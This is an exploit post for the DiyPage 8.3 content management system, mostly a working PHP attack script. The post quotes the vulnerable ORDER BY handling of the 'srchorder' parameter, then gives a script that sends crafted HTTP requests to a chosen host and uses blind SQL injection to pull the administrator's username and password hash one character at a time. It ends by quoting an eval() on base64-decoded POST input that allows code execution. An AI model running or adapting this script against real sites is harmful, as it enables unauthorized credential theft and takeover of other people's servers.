DiyPage8.3 orderby blind SQL injection && code execution

$srchorder= $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

        $sql='SELECT eid,builddate,title,author,content';
        $sql.=' FROM '.DP_DBPREFIX.'cms_entry WHERE active=1 AND';
        。。。。。。
        。。。。。。。。。。。
               $sql.=' ORDER BY '.$srchorder.' '.$ascdesc;
        $sql.=' LIMIT '.$offset.','.$srchtotal;
        $query=$db->query($sql);

<?
print_r('
--------------------------------------------------------------------------------
DiyPage8.3 js.php orderby blind SQL injection exploit

BY xZL && 大蝉
Team: http://www.0kee.com
Thx for Flyh4t
--------------------------------------------------------------------------------
');

if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to Diypage
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}

function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$prefix="dp_"; //表前缀
$search_keywords=""; //搜索关键字
$inject_keywords=""; //注入关键字(正常页面)
$cookie="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo 'Error... check the path!'; die;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo "[~]exploting now,plz waiting\r\n";

/*get password*/
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+password+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+password+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi($inject_keywords,$html)) {$password.=chr($i);echo"[+]password:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

/*get userid*/
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="srchorder=1+and+If(ASCII(SUBSTRING((SELECT+username+FROM+".$prefix."user_list+where+gid=2),".$j.",1))=".$i.",1,(SELECT+username+FROM+".$prefix."user_list))%23";
$packet ="GET ".$path."js.php?mod=dpcms&name=searchsubmit&srchperpage=10&keywords=$search_keywords&".$sql." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi($inject_keywords,$html)) {$admin.=chr($i);echo"[+]username:".$admin."\r\n";break;}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

print_r('
--------------------------------------------------------------------------------
[+]username -> '.$admin.'
[+]password -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

if ($_POST['issubmit']==true) {
        $importarray=array();
        eval(b64($_POST['rulestr']));

function b64($str,$encode=false) {
        if ($encode) {
                return '[b64]'.base64_encode($str);
        }else{
                if (substr($str,0,5)=='{b64}' or substr($str,0,5)=='[b64]') {
                        return base64_decode(str_replace(array('{b64}','[b64]'),'',$str));
                }else{
                        return $str;
                }
        }
}